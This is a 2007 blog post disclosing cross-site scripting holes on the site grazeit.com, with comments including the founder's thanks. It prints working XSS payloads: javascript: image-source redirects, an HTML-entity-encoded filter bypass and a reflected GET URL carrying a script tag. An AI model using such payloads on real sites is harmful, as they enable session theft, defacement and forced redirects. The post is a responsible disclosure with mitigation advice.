Wednesday, January 24, 2007

XSS on GrazeIt.com



Recently while grazing over the net, I found this site grazeit.com. This is a site which keeps a database of good websites found on the net by netizens.

But there is an XSS hole (Cross site scripting ) on the site which allow users to redirect the page to any desired location.

Of course this hack does not work on the secure browser Mozilla Firefox. If you are not using Firefox, download for free (The link is given bottom right).

Probably you arrived at this page from grazeit.com if you are using Microsoft Internet Explorer!

So how did it work?
Grazeit.com allows <IMG tag with the src attribute.

<img src="javascript:window.location='http://digitalpbk.blogspot.com/'" /> Fixed (No longer works)
<img src="javascript:location='http://digitalpbk.blogspot.com/'" /> Fixed (No longer works)

is all we have to post to get redirected.

Level 2
So the grazeit admins have modified the filter to take care of the above 2 methods. But still the filter isn't good enough for :
<img src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&
#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;
&#40;&#39;&#88;&#83;&#83;&#39;&#41;&gt; />
Fixed

<script src="URL" />fixed


GET Cross site Scripting holes
http://www.grazeit.com/Backpage.asp?BPID=210&FilterBy=tags&FilterTag=%3Cscript%3Ealert('hi')%3C/script%3E&FilterTagID=1325

to Grazeit.com administrators
Great work guys. But please remove this serious security vulnerability as it can be used for more than redirection. It can be used to deface, steal user sessions etc.
Thank you for making Grazeit.com.

How to remove this vulnerablilty?
To remove this vulnerablity you have to strengthen the filters.
To do this, the src tag must be stripped off unacceptable characters or these special characters must be encoded such that the URL would remain the same, but it would not be rendered by the browser as a script.


Happy surfing...

3 comments:

pazavi said...

Hi Arun,
My name is Avi Paz, and I am the founder of grazeit. First of all, I would like to thank you for exposing (very gracefuly,I must say) this security vulnerability. We took care of it, and I hope now everything is in order.
I am very happy to have you on board, and hope you will now spread your word to where it matters - meaning cotributing your cool stuff to relevant grazepages - and link to tour useful posts. BTW - It will be great if you will upload your image to your user profile@grazeit (mygraze. Thanks again. cheers.
Avi

Arun Prabhakar said...

hi Avi,

You guys need to strengthen the filters again..

Pune-IPL Team said...

are ye fan increase karana ab band ho gaya hai...fan mark pe niche code ata hi nahi....
tell me another trick yaar!!